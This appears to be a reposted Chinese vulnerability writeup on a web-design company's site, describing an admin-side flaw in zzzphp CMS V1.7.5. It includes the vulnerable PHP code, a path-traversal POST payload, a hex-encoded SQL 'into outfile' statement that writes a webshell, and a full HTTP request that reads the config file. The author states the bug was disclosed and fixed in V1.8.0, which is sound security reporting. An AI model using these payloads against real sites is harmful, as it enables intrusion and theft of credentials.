符合中小企业对网站设计、功能常规化式的企业展示型网站建设
本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...
商城网站建设因基本功能的需求不同费用上面也有很大的差别...
手机微信网站开发、微信官网、微信商城网站...
本篇文章为大家展示了zzzphp后台限制不严格导致多种安全问题该怎么办,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。
创新互联坚信:善待客户,将会成为终身客户。我们能坚持多年,是因为我们一直可值得信赖。我们从不忽悠初访客户,我们用心做好本职工作,不忘初心,方得始终。10余年网站建设经验创新互联是成都老牌网站营销服务商,为您提供网站设计、成都网站建设、网站设计、H5页面制作、网站制作、品牌网站设计、小程序定制开发服务,给众多知名企业提供过好品质的建站服务。
zzzphp是一款php语言开发的免费建站系统以简单易上手的标签、安全的系统内核、良好的用户体验为特点是站长建站的最佳选择。目前zzzphp最新版为V1.7.5正式版在做代码审计的时候发现全版本后台数据库还原限制不严格导致多种安全问题可以造成执行任意SQL语句任意文件读取、上传webshell等。
首先进入后台数据库备份页在之前旧版本中可以直接编辑备份数据库的内容
抓包发现调用处为save.php的act为editfile这里提交的POST数据内容为
file=%2Fzzzphp%2Fadmin768%2Fbackup%2F1591758681.bak&filetext=select+111+into+outfile+%27c%3A%5C%5Cxampp%5C%5Chtdocs%5C%5Czzzphp%5C%5Ca.php%27%EF%BC%9B
在代码里跟踪editfile函数代码可以发现
function editfile(){ $file=getform('file','post'); $filetext=getform('filetext','post'); $file_path=file_path($file); $safe_path=array('upload','template','runtime'); if(arr_search($file_path,$safe_path)){ $file=$_SERVER['DOCUMENT_ROOT'].$file; !(is_file($file)) and layererr('保存失败文件不存在'); }else{ layererr('非安全目录文件不允许修改'); } if (create_file($file,$filetext)){ layertrue ('修改成功'); }else{ layererr('保存失败'); }; }
通过一些判断后进入create_file函数
function create_file( $path, $zcontent = NULL, $over = true ) { $path = str_replace( '//', '/', $path ); check_dir( dirname( $path ), true ); $ext=file_ext( $path ); if(in_array($ext,array('php','asp','aspx','exe','sh','sql','bat')) || empty($ext)) error( '创建文件失败,禁止创建'.$ext.'文件,' . $path ); $handle = fopen( $path, 'w' )or error( '创建文件失败,请检查目录权限' ); fwrite( $handle, $zcontent ); return fclose( $handle ); }
发现这里其实做了三个限制
1、文件需要存在
if(in_array($ext,array('php','asp','aspx','exe','sh','sql','bat')) || empty($ext))
2、如果文件后缀为php、asp、aspx这种关键会受限制但是黑名单还是可以进行绕过比如没有禁止cerdexphp3,phtml这种特殊后缀。
if(in_array($ext,array('php','asp','aspx','exe','sh','sql','bat')) || empty($ext))
3、路径需要满足upload、template或者runtime
$safe_path=array('upload','template','runtime');
首先因为是备份文件文件必须是存在的所以轻松绕过限制1由于是bak文件的后缀也不受后缀影响可以绕过限制2但是限制3需要路径需要满足upload、template或者runtime因为是在后台目录下所以不符合因为是array匹配尝试构造../相对路径
file=%2Fzzzphp%2Fupload%2F..%2Fadmin768%2Fbackup%2F1591758681.bak
这样可以成功绕过限制可以达到对数据库备份文件的修改如下图所示
这里有个小问题Filetext内容会经过txt_html检查在\inc\zzz_main.php第817行
function txt_html( $s ) { if ( !$s ) return $s; if ( is_array( $s ) ) { // 数组处理 foreach ( $s as $key => $value ) { $string[ $key ] = txt_html( $value ); } } else { if (get_magic_quotes_gpc()) $s = addslashes( $s ); $s = trim( $s ); //array("'"=>"&apos;",'"'=>"&quot;",'<'=> "&lt;",'>'=> "&gt;"); if ( DB_TYPE == 'access' ) { //$s= toutf( $s ); $s = str_replace( "'", "&apos;", $s ); $s = str_replace( '"', "&quot;", $s ); $s = str_replace( "<", "&lt;", $s ); $s = str_replace( ">", "&gt;", $s ); }else{ $s = htmlspecialchars( $s,ENT_QUOTES,'UTF-8' ); } $s = str_replace( "\t", ' &nbsp; &nbsp; &nbsp; &nbsp;', $s ); $s = preg_replace('/script/i', 'scr1pt', $s ); $s = preg_replace('/document/i', 'd0cument', $s ); $s = preg_replace('/.php/i', 'php', $s ); $s = preg_replace('/ascii/i', 'asc11', $s ); $s = preg_replace('/eval/i' , 'eva1', $s ); $s = str_replace( array("base64_decode", "assert", ""), "", $s ); $s = str_replace( array("\r\n","\n"), "
", $s ); } return $s; }
如果直接写入内容如
select 111 into outfile'c:\\xampp\\htdocs\\zzzphp\\a.php'
单引号会被转换所以将以上内容转换成16进制也不能有\r\n写成一行
set @a=0x73656c6563742031313120696e746f206f757466696c652027633a5c5c78616d70705c5c6874646f63735c5c7a7a7a7068705c5c612e70687027;preparecmd from @a;execute cmd;
可以看到能成功修改
然后我们再看看恢复数据库的操作。
function restore(){
是的并没有做任何检查直接可以按句恢复这样导致执行备份webshell的SQL语句执行并在网站目录下生成a.php。
在最新版本笔者下的是V1.7.5正式版中编辑数据库bak文件显示此文件不允许编辑因为在编辑模板template\templateedit.tpl处做了safe_ext限制只允许读取xml、html、css、js文件后缀。
那么如何绕过限制呢既然不让编辑原有的数据库那么自行上传一个数据库bak文件试试在后台上传设置里增加bak后缀看来是没有限制的。
在附件上传中上传bak文件也可以看到能正常上传成功
然后数据库恢复的时候将path修改成上传的bak文件
并跟踪程序发现一路畅通直接进入数据库备份恢复可以看到SQL语句成功进入执行体db_exec()执行
在数据库执行体中继续往下看:
function db_exec( $sql, $d = NULL ,$log=true) { $db = $_SERVER[ 'db' ]; $d = $d ? $d : $db; if ( !$d ) return FALSE; $sql = str_replace( '[dbpre]', DB_PRE, $sql ); $n = $d->exec( $sql ); db_errno_errstr( $n, $d,$sql); str_log( $sql."\t" , 'log' ); return $n; }
在执行exec完SQL会进入记录日志函数
str_log( $sql."\t" , 'log' );
跟踪str_logh函数发现在zzz.file.php中613行跟进到str_log文件看到文件的命名规则为文件命名规则为当天时间的时间戳+数据库用户+数据库密码并且是未授权访问
从后台-操作记录中也可以访问
突然想到如果将path修改为系统限制文件比如配置文件config/zzz_config.php内容将会被转化成sql语句并记录日志然后读取到修改报文如下。
zzz_config.php配置内容文件果然可以被成功读取到。
POST http://127.0.0.1/zzzphp/11111111111/save.php?act=restore HTTP/1.1 Host:127.0.0.1 Connection:keep-alive Content-Length:41 Accept:*/* X-Requested-With:XMLHttpRequest User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/83.0.4103.97 Safari/537.36 Content-Type:application/x-www-form-urlencoded; charset=UTF-8 Origin:http://127.0.0.1 Sec-Fetch-Site:same-origin Sec-Fetch-Mode:cors Sec-Fetch-Dest:empty Referer:http://127.0.0.1/zzzphp/11111111111/?datebackuplist Accept-Encoding:gzip, deflate, br Accept-Language:zh-CN,zh;q=0.9 Cookie:zzz013_adminpass=1; zzz013_adminpath=0; zzz013_adminname=admin;zzz013_adminface=..%2Fplugins%2Fface%2Fface01.png; zzz013_admintime=1591790181;XDEBUG_SESSION=PHPSTORM; PHPSESSID=mtg1vpfnapf6abr6sikv1b0lb1 path=%2Fzzzphp%2Fconfig%2Fzzz_config.php
1、建议增加对path路径的限制
2、建议对数据库恢复内容进行过滤
笔者已经将漏洞提交给国家漏洞中心,并关注到官方20200701 zzzphp V1.8.0正式版对该问题已做了修复。
上述内容就是zzzphp后台限制不严格导致多种安全问题该怎么办,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注创新互联行业资讯频道。